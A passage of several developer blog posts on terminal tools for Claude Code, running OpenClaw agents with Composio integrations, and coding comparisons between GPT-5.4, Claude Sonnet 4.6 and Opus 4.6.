That is the workflow I use the most.

Since you have 500+ app access, you can already imagine how many other things you could automate from there.

They recently added CLI support as well, which you can install here: Composio CLI

For development, Composio provides a playground with test users, execution logs, and real-time trigger streaming so you can iterate on agent behaviour locally before going to production.

3. ripgrep

ℹ️ The fastest way to search through a codebase from the terminal.

What it is?

It is a ridiculously fast search tool for the terminal.

It lets you search through files, code, and folders almost instantly.

If you have ever used grep, which I assume you have, it's a complete and faster replacement for that in real world repos.

A simple example:

rg "useEffect"

That will search for useEffect across your entire project and show you where it appears.

Why use it with Claude Code?

This is one of the first tools I'd install.

When working on a real world repo, you are constantly searching for things. Function names, config, and whatnot.

ripgrep basically makes that fast.

Even Claude Code defaults to using this tool when searching for things in its workflow. Overall, it is just super handy to have a quick way to move around the repo yourself without digging around manually.

4. tmux

ℹ️ A better way to manage terminal sessions.

What it is?

tmux lets you run multiple terminal sessions inside one terminal.

You can split panes, open multiple windows, switch between them quickly, and keep everything organized without opening a bunch of separate terminal tabs.

It might feel a little unnecessary at first. But once you get used to it, there is no way back.

Why use it with Claude Code?

For me, tmux is one of the most useful tools to pair with Claude Code, and it is actually what is running in my terminal right now as I work on this blog inside Neovim. 👀

I usually have Claude in a pane, with Neovim or a server running in one window, Lazygit in another, and then some extra panes for running commands.

If you use Neovim, it gets even better. You can have Claude open in one split and Neovim in another. As Claude makes changes, if you need to edit something, Neovim is right there. And for diffs or Git work, Lazygit is sitting in another window.

How cool is that?

You are not constantly jumping between tabs or losing track of what is running where.

5. FFmpeg

ℹ️ The go-to CLI tool for handling just about any media file.

What it is?

Honestly, this is one of the best tools I have added to my workflow recently.

FFmpeg is a command line tool for working with media files. You can use it to convert images from one format to another, like PNG to JPG, convert video formats, compress files, trim audio, and do all sorts of file processing.

It supports basically every format you can think of.

As developers, we end up doing this kind of stuff all the time. And having one tool that handles all of it from the terminal is just super handy.

💡 FUN FACT: Almost all the online media tools that you use on the internet, like online video compressors and similar stuff, are powered by FFmpeg under the hood.

Once you have it in your terminal, you really don't need to ever visit such sites.

Why use it with Claude Code?

The only catch is that FFmpeg commands are a little complex.

Even for a simple task, the syntax is just a little too much to understand.

Here's a quick command to crop a video file:

ffmpeg -i input.mp4 -vf "crop=1280:720:0:0" -c:a copy output.mp4

That is exactly where Claude Code becomes useful.

You can just describe what you want in plain English, and let Claude generate the right FFmpeg command for you.

6. Lazygit

ℹ️ A simple TUI for Git

What it is?

Lazygit is a terminal UI for Git.

It gives you a much nicer way to handle things like commits, branches, stashing, rebasing, and reviewing changes without typing every Git command manually.

You still stay in the terminal.

It just makes the whole Git workflow super easy, and you do not need to remember and type out any commands. Just knowing the concepts is enough.

Why use it with Claude Code?

This is one I always have open beside Claude Code.

When Claude makes a lot of changes in a bunch of files, Lazygit makes it easier to review everything, stage only what you want, and manage the overall Git workflow.

I usually keep Lazygit open in every session inside tmux, in its own window, so I can quickly jump there and handle Git stuff whenever I need to.

I will talk about tmux a bit later in the list, but this combo works really well.

7. btop

ℹ️ A much better way to monitor your system

What it is?

btop is a system monitor for the terminal.

It gives you a clean view of CPU, memory, disk, network, and running processes, all in one place.

There is also htop, which a lot of people already know and use. But personally, I prefer btop.

It just feels a bit more user friendly, and overall nicer and easier to filter down processes.

Why use it with Claude Code?

When you are doing a lot inside the terminal, especially with bigger repos, it is really useful to keep an eye on system usage.

That might be Claude, any processes it launches with your permission, local servers, or anything else running in the background.

btop gives you a quick way to see what is eating memory, what is using CPU, and whether your machine is starting to struggle, especially when you're using local models.

8. fzf

ℹ️ The backbone of fuzzy finding in the terminal

What it is?

I have probably been using this tool longer than any other in this list.

fzf is a command line fuzzy finder.

It lets you search and pick things interactively from the terminal.

That could be files, directories, Git branches, command history, processes, or really anything you can pipe into it.

If you haven't heard about this tool or have never used it, you are doing something wrong 😏.

A simple example:

find . -type f | fzf

This gives you a fuzzy searchable list of files in the current directory.

Why use it with Claude Code?

This is one of those tools that just makes terminal workflows feel faster.

Whether I am jumping between files, searching through something, or picking from a long list of options, fzf is usually involved somewhere. I have so many scripts built around fzf.

And when you are already spending a lot of time in the terminal with Claude Code, that kind of speed matters.

It is not really a Claude specific tool. It is one of the foundations that make working in the terminal and overall moving between things a lot better.

9. (Optional) LLMFit

ℹ️ Handy if you are experimenting with local or custom models alongside Claude Code.

What it is?

LLMFit is a CLI tool that scans your system hardware and tells you which local AI models you can run smoothly on your system.

If you are planning to run a local model, it is a nice way to avoid downloading something that your system will struggle with. Its whole purpose is to help match models to the machine you have.

Installing is as simple as:

pip install llmfit

Now, to scan your hardware against models, run this:

llmfit scan

and it will list out all the models with their metadata and performance scores based on your hardware.

Why use it with Claude Code?

This one is definitely more niche.

But if you are running Claude Code with a local or custom model setup, it can help you figure out what will run well on your machine before you waste time downloading the wrong model.

It is not something everyone will need, but for people who prefer the Claude Code agent and want to test newer local or custom models from other providers, this is an option as well.

You can find many guides on doing that. One that I referenced while trying it out is by Luong NGUYEN.

A few more nice ones

There are also a few other terminal tools I use a lot that I did not want to give a full section to, but they are still very much part of the overall workflow.

Things like fd, zoxide, eza, yazi, and bat all make the terminal feel nicer to work in.

Some help you move around directories faster. Some make listing files, previewing content, or moving around in the filesystem way better than the default.

I leave it up to you to research these tools.

None of these are Claude Code specific.

Ones I'd install first

If I had to set this up again from scratch, I’d probably start with ripgrep, GitHub CLI, tmux, and Lazygit.

That already covers a lot of the core workflow around Claude Code.

And separately, I’d also set up Composio.

It’s a bit different from the rest here. It’s not exactly just another CLI tool, but more of an MCP server. Really useful if you want to automate parts of your workflow and connect Claude to external tools in a cleaner way.

Final thoughts

You definitely do not need every tool in this list.

But a few of them can make working with Claude Code a lot smoother, especially once you start using it more seriously.

At the end of the day, it’s really just about making the workflow around Claude feel cleaner and easier to manage.

Shrijal AcharyaFollow

SDE • GOLD @Microsoft Student Ambassador • Prev Lead Collab and Dev-Team Lead @oppiaorg • Mail for collaboration

🚀 How to run a fully-autonomous company with OpenClaw 🦞

Shrijal Acharya — Thu, 02 Apr 2026 14:39:22 +0000

Imagine owning a company with just one human employee, and that too is yourself. The rest? All OpenClaw agents!

Before OpenClaw, that would have sounded completely silly, but with it, it's possible, really possible!

You can automate your entire company or simulate a fully functioning one with just OpenClaw and your VPS, Mac Mini, or local system for testing.

TL;DR

In this tutorial, you'll learn how to run an entire company using just yourself and a bunch of OpenClaw agents.

What you will learn: ✨

What OpenClaw is and how it works
Why storing API keys locally is a bad idea
Setting up Composio for secure OAuth-based integrations
Connecting your first app and getting agents up and running 🚀

Ready to become a one-person company? 👀

What's OpenClaw?

💁 I assume you already know what OpenClaw is. If not, why are you even here? Just kidding... The blog itself is completely beginner friendly. If you already have an idea of what OpenClaw is, just skip this section.

OpenClaw is a personal AI assistant you run on your own machine or a server you own. It is the thing that actually sits between your model provider (OpenAI, Anthropic, Kimi, etc.) and the stuff you want done, such as messaging, tools, files, and integrations, and this idea is what actually makes the one-person company possible.

Take this as a mental model:

Your LLM is the brain (thinks)
OpenClaw is the body (it can do things)
The Gateway is the receptionist (routes messages in and results out)

It provides the model with a runtime that can call tools, maintain state, and appear where you already chat (WhatsApp, Telegram, Slack, Discord, etc.). Now, that's just the gist. There's much more to understand. I assume you've already worked with it, so I'm not going any deeper than this in the intro.

For installation, visit the OpenClaw installation guide, and based on your distro and installation choice, install it on your machine.

If you just want it running quickly, do the normal installation. If you're even slightly paranoid (which you should be 😮‍💨), use Docker.

Also, make sure you set up a channel for easier chatting from your phone (preferably Telegram).

For help setting up a channel, ask OpenClaw itself. It knows itself better than anyone else on the internet.

💁 If you face issues like OpenClaw: access not configured when talking with the bot, make sure you run this command:

openclaw pairing approve <telegram/whatsapp/...> <pairing_code>

Just like that, now you have an agent listening on your channel. Message anything, and you should get a reply back.

From here onwards, I assume you already have OpenClaw running. To make sure everything is working, run this command:

openclaw health

If not, try running openclaw doctor, which helps debug your gateway or channel issues.

Run a whole company?

Yeah, in theory, you can actually automate or run an entire company. Can't guarantee the company will stand long, but with OpenClaw, it's now possible.

The only human in the process is going to be yourself. All your employees will be OpenClaw Agents.

As you can see, most day-to-day operations of running a company, such as sales, team meetings, and customer care, can be managed with OpenClaw Agents. And there are many more than just the ones in the image, of course. This is just a quick sketch to give you an idea.

Problem with "Just OpenClaw"

By default, OpenClaw works with API keys, and it stores them in a plain text file in the ~/.openclaw/ directory for all the services you use, such as Google, Gmail, and so on. This is not a very good practice if you're running this on your local machine. If using something like a VPS or the hyped Mac Mini, it's fine, but still, storing credentials in a local plain text file is never a good idea.

Especially if you're using smaller models, they are even more prone to prompt injections, and since OpenClaw has whole system access, it might wipe out your entire system without you doing anything.

What's actually gone wrong in the wild (already):

Malicious skills on ClawHub: researchers found hundreds to thousands of skills that were straight-up malware or had critical issues, including credential theft and prompt injection patterns.

Prompt injection turning into installs: there's been at least one high-profile incident where a prompt injection was used to push OpenClaw onto machines via an agent workflow.

For the above reasons, I recommend that you use some hosted service which in my case, Composio. It lets you authenticate using OAuth, which is the most secure option over pasting keys locally.

Connecting your first app

Now, it's time to create agents, but first, we need to set up or connect our first app from Composio.

The agents will mostly revolve around working with those applications from Composio.

1. Install Composio Plugin

Composio's OpenClaw plugin connects OpenClaw to Composio's MCP endpoint and exposes third-party tools (GitHub, Gmail, Slack, Notion, etc.) through that layer.

openclaw plugins install @composio/openclaw-plugin

2. Composio Plugin Setup

Log in at dashboard.composio.dev
Choose OpenClaw as the client.
Copy your consumer key (ck_...) from the Composio dashboard settings, then set it:

openclaw config set plugins.entries.composio.config.consumerKey "ck_your_key_here"

Now, it's a good idea to restart the gateway:

openclaw gateway restart

3. Verify the plugin loaded

openclaw plugins list
openclaw logs --follow

You're looking for something like "Composio loaded" and a "tools registered" message.

If the plugin is "loaded", it means you can now successfully access Composio.

Here's how it works:

The plugin connects to Composio's MCP server at https://connect.composio.dev/mcp and registers all available tools directly into the OpenClaw agent. Tools are called by name — no extra search or execute steps needed.

If a tool returns an auth error, the agent will prompt you to connect that toolkit at dashboard.composio.dev.

Here's how the configuration looks:

{
  "plugins": {
    "entries": {
      "composio": {
        "enabled": true,
        "config": {
          "consumerKey": "ck_your_key_here"
        }
      }
    }
  }
}

You can configure the following options directly from the config file:

enabled: enable or disable the plugin
consumerKey: your Composio consumer key
mcpUrl: the MCP server URL. By default, it's https://connect.composio.dev/mcp

Previously, you had to configure API keys per integration, but with Composio you don't have to worry about any of that. Just make sure not to leak the consumer key that we generated.

And it's that simple. Everything works out of the box just as you would use any other OpenClaw plugin!

Now, to test if it works, head over to the Control UI chat and send a message, something like:

"List the Composio tools you have available."

If it asks you to connect the tools, head over to dashboard.composio.dev and connect each of the tools you require. It's as simple as clicking Connect.

All the integrations you use are OAuth-hosted, and only the tools you connect will be available to OpenClaw. Nothing more than that.

Setting up a Multi-Agent Team

The idea is pretty clear. Since one single agent wouldn't be enough to handle all sorts of company requirements due to context window limitations, you could have multiple sub-agents for multiple task types.

Say, one agent AgentA handles marketing, AgentB handles business analysis, AgentC handles something else.

Each agent has a distinct role, personality, and model optimized for its use case — say, for business analysis, you'd want a more research-oriented model like GPT-5.2.

And how do you create them? It's simple, just chat with OpenClaw itself, either in the chat window or your configured channel.

Example:

Please create a new agent called **Shri**. This agent should be capable of handling tasks such as reading and composing emails, and scheduling Google Meet sessions.

For the model, use **Claude Sonnet 4.6** (`claude-sonnet-4-6`).

Please ensure that the existing main agent remains untouched and unchanged.

And it will create a new agent, which you can view in the Agents tab in the OpenClaw dashboard or by running /agents in the OpenClaw TUI.

Similarly, do it for all your different work types. Create a separate agent for each type of work.

The main agent can then delegate work to those specialized agents, each handling one specific task type, which improves response quality because one agent is handling one type of work instead of everything at once.

💡 TIP: This also helps you reduce model usage costs, as you can assign more reasoning-heavy models to complex tasks and smaller, cheaper models to simpler ones.

What's Missing?

Everything seems good, but there's one thing missing... autonomy.

You still have to message OpenClaw manually to get things done, which isn't ideal when you're planning on using it as an AI employee.

There are two ways to achieve this:

1. If you're a little technical

You must be familiar with cron jobs and their syntax. If so, this is a way to do it directly from the CLI outside of OpenClaw.

Run the following command:

openclaw cron add --schedule "<cron_syntax>" --message "<prompt>"

Say you want it running every single day at 8 AM:

openclaw cron add --schedule "0 9 * * *" --message "<prompt>"

2. If you're not technical

Similar to how we used a prompt to create a new agent, all you need to do is write a prompt:

Every morning at 9 AM, send me the top news of the day. Also scan my Google Calendar for the day, identify each attendee and their company. Send me two different messages on Telegram: one with the news summary and one with the meeting details.

Use the relevant Agent you have for each purpose.

💁 There's also a similar concept called Heartbeat, which is another approach for scheduling tasks in OpenClaw. You can check it out here: OpenClaw Heartbeat

Workflow Demo

Okay, time for a demo.

Showing an entire workflow demo of running a company would be too much work, so for this demo, I will show you one part of the workflow: checking the calendar and messaging a summary with attendees every day at a set time.

You could have it run every X hours or every single day at a fixed time. After each interval, the model will do as said above (Obviously, the idea is too naive, but it's just for this demo.) The possibilities are endless.

Keep this in mind: “anything that you can do manually on the internet, you can automate with OpenClaw.” So, you get the idea.

💁 NOTE: If you're serious about this idea, it's better to run this on a VPS or a Mac Mini, because you mostly don't have your personal PC running 24/7.

Here's the demo:

Conclusion

So far, you've learned how to run a fully functioning company with just yourself and a bunch of OpenClaw agents, using Composio as the secure integration layer between OpenClaw and all your third-party apps.

Be sure to give a star to Composio and OpenClaw on their GitHub repositories.

If you found this article helpful, drop a like and share your thoughts in the comments below. 👇

Happy automating! 🥳

Shrijal AcharyaFollow

SDE • GOLD @Microsoft Student Ambassador • Prev Lead Collab and Dev-Team Lead @oppiaorg • Mail for collaboration

Everything you need to know about OpenAI GPT-5.4 ✌️

Shrijal Acharya — Sat, 21 Mar 2026 14:08:05 +0000

OpenAI’s new GPT-5.4 is here, and on paper at least, it looks like one of their strongest all-rounder models so far.

TL;DR

In this article, we take a quick look at OpenAI GPT-5.4, go through its official benchmarks, and then compare it in one small coding task against Anthropic’s general-purpose model, Claude Sonnet 4.6, to see how it actually performs.

We briefly go over what GPT-5.4 is, what OpenAI is claiming with this model, and why it looks like one of their strongest all-rounder releases so far.

We look at the official benchmarks around coding, reasoning, tool use, and computer-use capabilities to get an idea of how strong the model looks on paper.

Instead of relying only on benchmarks, we also compare GPT-5.4 against Claude Sonnet 4.6 in one small, quick coding task (not enough to judge fully, but still...).

Brief on OpenAI GPT-5.4

So, before we jump into the coding test, let me give you a quick brief on GPT-5.4, because this is one of OpenAI’s biggest model releases in a while.

OpenAI released GPT-5.4 on March 5, 2026, and they are positioning it as their most capable and efficient frontier model for professional work.

What makes this model interesting is that OpenAI is not selling it as just a coding model, and not just a reasoning model either. They are basically pitching it as an all-round professional work model that combines strong reasoning, strong coding, better tool use, and much better performance on practical work like spreadsheets, presentations, etc.

Honestly, this part matters more than it sounds. A lot of real AI work is not just prompting or writing code, it is dealing with PDFs, spreadsheets, slides, and all kinds of unstructured data. That is also where something like Tensorlake makes sense, because it helps turn that mess into something models can actually work with.

And the specs are also pretty wild. GPT-5.4 supports a 1.05M token context window with 128K max output tokens, which is pretty good room to work with. All in all, this helps the model remember things better. Also, a thing to note is that the knowledge cutoff for this model is August 31, 2025.

Now, let's talk about the part we mostly care about.

On the official OpenAI benchmarks, GPT-5.4 scores 57.7% on SWE-Bench Pro (Public), which puts it basically side by side with GPT-5.3-Codex, a coding-focused model, at 56.8%. So yes, OpenAI says this general-purpose model is slightly better than GPT-5.3-Codex, a coding-focused model, which I personally have not had the best experience with compared to Claude models, and that is kind of wild to think about.

OpenAI says GPT-5.4 is their first general-purpose model with native computer-use capabilities, which is a pretty big deal. That means it is built not just to generate text or code, but also to operate across software, work from screenshots, and handle more agent-like workflows. On OSWorld-Verified, it scores 75.0%, which OpenAI says is above human performance on that benchmark. 🤯

One thing I also like here is that OpenAI is claiming GPT-5.4 is their most factual model yet. It is said to be 18% less likely to contain any errors compared to GPT-5.2.

For API developers, pricing matters, of course.

The standard GPT-5.4 model is listed at $2.50 per 1M input tokens, $0.25 cached input, and $15 per 1M output tokens. GPT-5.4 Pro is way more expensive at $30 input and $180 output per 1M tokens, and OpenAI says it can take several minutes on hard tasks, so that one is clearly for cases where you really want the best answer and are okay paying for it.

💁 The normal GPT-5.4 model is probably the one most people will actually care about day to day, and that's what I'd prefer.

And as always, benchmarks are benchmarks. But on paper at least, GPT-5.4 looks like one of the strongest all-rounder models OpenAI has shipped so far.

Quick Coding Test

As this is a general-purpose model instead of a coding-tuned model, comparing the model's ability solely on coding is just not fair. But as developers, we mostly care about how good the model is at coding anyway, so just to give you an idea of how this model performs, we will do a quick test.

As you can see, there's not much difference in SWE-Bench between GPT-5.4 and GPT-5.3-Codex:

GPT-5.4: Latency (s): 1,053, Accuracy: 57.7%, Effort: xhigh
GPT-5.3-Codex: Latency (s): 1,114, Accuracy: 57.2%, Effort: xhigh

But to give you an idea of what to expect from this model in coding, I will run one small, quick test.

Let's take two general models, one from Anthropic, Claude Sonnet 4.6, and one from OpenAI, GPT-5.4, not pro, and compare them against each other to show the difference in their coding skills.

For the test, we will use the following CLI coding agents:

Claude Sonnet 4.6: Claude Code (Anthropic’s terminal-based agentic coding tool)
OpenAI GPT-5.4: Codex CLI

As GPT-5.4 is said to be strong in frontend, why not test it on frontend itself?

Test: Figma Design Clone with MCP

In this test, we'll be comparing both models on a Figma design, a complex dashboard with so many things happening in the UI.

Here's the Figma design that I'll ask both models to clone:

Prompt:

Build a **pixel-accurate clone** of the attached Figma design frame using the **provided Next.js project** as the starting point. Do **not** create a new project. Instead, implement the UI inside the existing codebase.

https://www.figma.com/design/8quNKljV0spv67VAGsA75D/Dashboard-Design-Concept--Community---Copy-?node-id=69-123&t=Tvu2UB7UDMqkvPRb-4

Please match the design as closely as possible, with close attention to layout, spacing, alignment, typography, colors, borders, shadows, corner radius, and overall visual balance.

Requirements:

* use the existing **Next.js** setup
* keep the code clean and componentized
* make the page responsive without changing the intended design
* use semantic HTML where appropriate
* avoid adding your own design decisions unless necessary
* if any part of the design is unclear, make the most reasonable choice and stay visually consistent

Prioritize **design accuracy first**, then code quality.

GPT-5.4

GPT-5.4 pretty much one-shotted the entire implementation in one go, which was honestly nice to see. It did not need any follow-up prompt, no fixing, nothing. It just took the Figma frame through MCP and started building the whole thing right away.

The final result actually looked decent. I would not call it pixel-perfect by any means, but compared to Claude Sonnet 4.6, I’d say the implementation looked noticeably better overall. The whole thing feels more like a static picture of the design than an interface you can actually interact with.

Time-wise, it took roughly 5 minutes to get to a working to the working build.

Here’s the demo:

You can find the code it generated here: GPT-5.4 Code

Token usage looked like this:

Total Token Usage: 166,501
Input Token Usage: 151,595
Cached Input Tokens: 1,291,776
Output Token Usage: 14,906
Reasoning Tokens: 1,479

And the following code changes:

Code Changes: 3 files changed, 803 insertions(+), 82 deletions(-)

To be honest, I still would not say this is the kind of code implementation you can just ship straight to production and call it done. But for a one-shot frontend clone from a Figma frame, this was a pretty solid attempt.

Claude Sonnet 4.6

Claude Sonnet 4.6 went straight into the implementation right away. It did run into an issue at first, not really a build error, but more of one of those annoying Next.js image gotchas:

After that, I gave it a quick follow-up prompt, and almost instantly, it fixed the issue and came back with a decent implementation.

As you’d expect, it did manage to clone the project structure and get the UI in place. And again, the same issue, there's just no functionality whatsoever. It just feels like a picture with no interactivity.

Here’s the demo:

You can find the code it generated here: Claude Sonnet 4.6 Code

Time-wise, it took 9 minutes 56 seconds to get to a working result, and the follow-up fix was pretty much instant.

Token usage, based on Claude Code’s model stats, looked like this:

Input Token Usage: 84
Output Token Usage: 35.4K

And the following code changes:

Code Changes: 10 files changed, 1017 insertions(+), 84 deletions(-)

To be honest, I’m not really impressed, but I’m not disappointed either. The result feels pretty neutral overall. It was able to use tools, get fairly close to the UI, and produce something usable for comparison, but the implementation itself feels a bit weird and not all that convincing.

Conclusion

So, after all the benchmarks, claims, and hype, I think the fairest takeaway is this: GPT-5.4 looks very strong on paper, and for a lot of people it works and is an upgrade, but it still doesn’t seem like it is the best model you can get for coding.

So yeah, I’d say GPT-5.4 is probably one of the strongest all-rounder models OpenAI has shipped so far, but whether it beats Claude, be it Sonnet or Opus, for coding in real usage is still something you’ll want to judge from your actual hands-on testing, not just benchmarks.

And honestly, that’s the real takeaway here anyway.

These models keep getting better at a speed that is honestly hard to keep up with. So rather than getting too stuck on who won one benchmark, the better thing to do is probably to keep building, keep testing, and keep learning how to use these models better for your use case.

What do you think, is GPT-5.4 actually that good, or is Claude still your go-to? 👇

Shrijal AcharyaFollow

SDE • GOLD @Microsoft Student Ambassador • Prev Lead Collab and Dev-Team Lead @oppiaorg • Mail for collaboration

🔥Claude Opus 4.6 vs. Sonnet 4.6 Coding Comparison ✅

Shrijal Acharya — Thu, 05 Mar 2026 14:04:59 +0000

Anthropic recently dropped the updated Claude 4.6 lineup, and as usual, the two names everyone cares about are Opus 4.6 and Sonnet 4.6.

Opus is the expensive “best possible” model, and Sonnet is the cheaper, more general one that a lot of people actually use day to day. So I wanted to see what the real gap looks like when you ask both to build something serious, not a toy demo.

Benchmark-wise, there’s a difference of course, but it doesn’t look that huge when it comes to SWE and agentic coding.

I kept it super basic: one test (but a big one), same prompt, same workflow. I just compared how close they got without me stepping in.

⚠️ NOTE: Don’t take the result of this test as a hard rule. This is just one real-world coding task, run in my setup, to give you a feel for how these two models performed for me.

TL;DR

If you just want the takeaway, here’s the deal with these models:

First, Opus 4.6 is the peak for coding right now. At the time of writing, it’s basically the OG, and nothing else comes that close.

Claude Opus 4.6 had a cleaner run. It hit a test failure too, but fixed it fast, shipped a working CLI + Tensorlake integration, and did it with way fewer tokens. Rough API-equivalent cost (output only) came out around ~$1.00, which is kind of wild for how big the project is.
Claude Sonnet 4.6 Surprisingly close for a cheaper, more general model. It built most of the project and the CLI was mostly fine, but it ran into the same issue as Opus and couldn’t fully recover. Even after an attempted fix, Tensorlake integration still didn’t work. Output-only cost was about ~$0.87, but it used way more time and tokens overall to get there.

💡 Obviously, this isn’t a test to “compare” the two head-to-head. It’s just to see the difference in code quality. In general, there’s never really been a fair comparison between Opus and Sonnet since their very first launch, Opus has always been on another level.

Test Workflow

ℹ️ NOTE: Before we start this test, I just want to clarify one thing. I'm not doing this test to compare whether Sonnet 4.6 is better than Opus 4.6 for coding, because obviously Opus 4.6 is a lot better. This is to give you an idea of how well Opus 4.6 performs compared to Sonnet.

For the test, we will use everyone's favorite CLI coding agent, Claude Code.

As both models are from Anthropic, it works best for both and is not biased toward either.

We will test both models on one decently complex task:

Task: Build a complete Tensorlake project in Python called research_pack, a “Deep Research Pack” generator that turns a topic into:
a citation-backed Markdown report, and
a machine-readable source library JSON with extracted text, metadata, summaries, you get the idea.

It also has to ship a nice CLI called research-pack with commands like:

research-pack run "<topic>"
research-pack status <run_id>
research-pack open <run_id>

We’ll compare the overall feel, code quality, token usage, cost, and time to complete the build.

💡 NOTE: Just like my previous tests, I’ll share each model’s changes as a .patch file so you can reproduce the exact result locally with git apply <file.patch>.

Why Tensorlake?

Tensorlake is a solid choice for this Opus 4.6 vs Sonnet 4.6 test because it is a real platform with enough complexity to quickly show whether a model can actually build something end to end. It has an agent runtime with durable execution, sandboxed code execution, and built in observability, so the test is not just writing a few functions, it is wiring up a production workflow.

And selfishly, it is also a good dogfood moment. 👀 If a model can spin up a Tensorlake project from scratch and get it working, that is a pretty strong sign for two things: these recent models are getting scary good and how usable Tensorlake is for building serious agent style pipelines.

Coding Tests

Test: Deep Research Agent

For this test, both models had to build the research_pack Tensorlake project in Python. The goal was simple: give it a topic, it crawls stuff, figures out sources, improves them, and spits out:

report.md with [S1] style citations
library.json with the full source library
a clean CLI: research-pack run/status/open
plus Tensorlake deploy support so you can trigger it as an app, not just locally

You can find the prompt I’ve used here: Research Agent Prompt

One thing that went a bit crazy is that both models ran into basically the exact same/similar issue during the run.

That shows how similarly these models can behave, which is kind of creepy. If you give them the exact same task and constraints, they’ll often make similar choices. I wanted to call that out because you might’ve noticed the same pattern too.

Not surprisingly, Opus fixed it much faster and with way fewer tokens. Sonnet took longer, burned a lot more context trying to debug it, and even after the fix pass, it still didn’t fully work.

Claude Opus 4.6

Opus was pretty straightforward.

It did hit a failure while running tests, but it was a quick fix. After that, everything looked clean: CLI worked, offline mode worked, and overall all the feature flags seem to work perfectly.

Here’s the acceptance checklist it generated at the end, I really love it as it created this after making sure all tests pass, and everything is in place, that's how it's done.

Here's the demo of the working CLI:

Note: The API key visible in the below demo videos has been revoked. Please don’t try to use it.

...and how it integrates with Tensorlake:

You can find the code it generated here in a patch file: Opus 4.6 Patch file

Cost: ~$1.001

ℹ️ NOTE: As I'm using a Claude plan and not on API usage, this is roughly calculated based on the input/output tokens.

Duration: 20 minutes 6 seconds + ~1 min 40 sec for the fix

Output Token Usage: 33.2K + ~4K for the fix

Code Changes: 156 files changed, 95013 insertions(+)

ℹ️ You can see the complexity of the project for yourself, and you’ll probably be shocked at how good these models have gotten. It’s no longer just boilerplate or small refactors. They can build a complete, end-to-end project from scratch from a single prompt. We’re officially in the real AI era.

Claude Sonnet 4.6

Sonnet was… close, but not quite as clean as Opus.

Just like Opus, it ran into a test failure during the run. This is one of those things you’ll notice with similar models: same prompt, same codebase, and they sometimes hit the exact similar weird issue.

Here’s the demo of the CLI (you’ll see it mostly working, but there are some rough edges) and not as well implemented as Opus:

...and how it integrates with Tensorlake:

It's not working as you can see. Sonnet did attempt a fix, but still couldn't get to a working state with Tensorlake. But overall, it was super close.

You can find the code it generated here: Sonnet 4.6 Patch

Cost: ~$0.87

ℹ️ Same as Opus 4.6, this is an approximate cost based on the input/output tokens.

Duration: 33 minutes 48 seconds + ~3m 18s for the attempted fix

Output Token Usage: 52.9K + ~5K for the fix (didn't work)

Code Changes: 88 files changed, 23253 insertions(+)

🤷‍♂️ I can’t really complain about Sonnet’s performance, other than this one issue. It still got almost everything working. And to be fair, Sonnet isn’t Anthropic’s flagship coding model like Opus. It’s more of a general-purpose model, and Opus also comes with a pretty big cost difference, so the gap in code quality is kind of expected.

And please don’t try using the API keys shown in the video, as it’s already revoked.

Conclusion

Opus as a lineup is just too good. If you want an end-to-end product that works most of the time with minimal hand-holding, go with Opus. If you want something cheaper, and you’re okay finishing the last bit yourself, Sonnet is still solid.

Even in this one test, you can already see the gap in implementation quality, token usage, and time spent.

And if Anthropic can cut Opus to half its price, or even get it close to Sonnet’s, it’d be over for most other models.

For me, the best way to use these models is still the same: let them build most of it fast, then run it, test it, and clean up the rough parts yourself.

Let me know your thoughts in the comments. ✌️

How to set up Secure OpenClaw and power it with 850+ SaaS Apps 🦞🔒

Shrijal Acharya — Thu, 05 Mar 2026 13:26:54 +0000

OpenClaw has been showing up in my feed way too much, so I finally sat down and tested it properly, and yeah, it comes with a few real problems.

In this post, I’ll cover what OpenClaw is, how to set it up, where the security risks really come from, and how to use safer remote integrations so you can make it a bit more secure and save yourself some stress.

TL;DR

If you just want the takeaway, here’s the deal with OpenClaw:

OpenClaw is a local agent gateway. It is the layer that connects your LLM (OpenAI, Anthropic, etc.) to real tools and local execution.

The “special sauce” is the package. People like it because it ships as a usable bundle: built-in skills, a simple “agent brain” file (SOUL.md), and easy chat support like messenger integrations.

Security is the big problem. By design, it can touch files, run commands, and pull third-party skills. The least-bad way to use it is with remote, sandboxed integrations (which I’ve shown how to set up).

Also, watch your token bill. It can be very inefficient and chew through credits fast, especially if you’re using hosted models instead of a local LLM.

Overall, you'll learn everything you need to understand and start with OpenClaw (and make it slightly better with secure integrations).

What's OpenClaw?

OpenClaw is a personal AI assistant you run on your own machine (or a server you own). It is not a new model. It is the thing that actually sits between your model provider (OpenAI, Anthropic, Kimi, etc.) and the stuff you want done, such as messaging, tools, files, and integrations.

Take this as a mental model:

Your LLM is the brain (thinks)
OpenClaw is the body (it can do things)
The Gateway is the receptionist (routes messages in and results out)

So when people say “OpenClaw turns an LLM into an agent,” what they really mean is: it gives the model a runtime that can call tools, keep state, and show up where you already chat (WhatsApp, Telegram, Slack, Discord, etc.).

Now, that's just the gist. There's a lot more to understand. I assume you've already worked with it, so I'm not going any deeper than this in the intro.

What's Special than something like Manus? 🤔

Manus is essentially "agent as a product," but you're limited to their UI, tools, rules, and cloud.

OpenClaw is more like “agent as a kit.” It’s meant to be installed, set up, and shaped around your own workflow. You decide what models it uses, what tools it can touch, what data it can access, and where it runs.

That's the biggest difference.

💁 "Manus is for convenience, and OpenClaw is for control."

Wow, that was a nice line I came up with on the fly. 😂

OpenClaw Installation

You’ve got two clean ways to install OpenClaw. If you just want it running quickly, do the normal installation. If you’re even slightly paranoid (which you should be 😮‍💨), do Docker.

The core requirement is Node ≥ 22.

Option 1: Normal install (recommended for most people)

Prereqs: Node 22+ and an API key (OpenAI, Anthropic, OpenRouter, whatever you’re using).

Install OpenClaw:

curl -fsSL https://openclaw.ai/install.sh | bash

Run onboarding (this sets up provider auth + gateway settings and can install the background service):

openclaw onboard --install-daemon

Check the gateway status (if you installed the service, it should already be running):

openclaw gateway status

Optional: Open the Control UI:

openclaw dashboard

Option 2: Docker (more isolated and secure)

Docker is great when you want a throwaway environment or isolation from your host, but it introduces an important rule:

ℹ️ Containers only see plugins and config if they share the same OpenClaw state directory/volume. So, it comes with a little complexity.

Clone and start the Docker stack:

git clone https://github.com/openclaw/openclaw
cd openclaw
./docker-setup.sh

💡 To know more about how/what it does, visit the OpenClaw Docker Quickstart

Control UI gotchas

If you open the Control UI, and it shows something like:

unauthorized: gateway token missing

That's normal. The UI needs a gateway token to connect.

Get your token:

cat ~/.openclaw/openclaw.json | jq -r '.gateway.auth.token'

Make sure jq is installed on your machine. Or, you can manually get the token from the config file ~/.openclaw/openclaw.json.

Then either:

Paste it in the UI (Overview → Gateway Access → Gateway Token)

Use a URL that includes it, for example via:

openclaw dashboard --no-open

OpenClaw is bad for Security

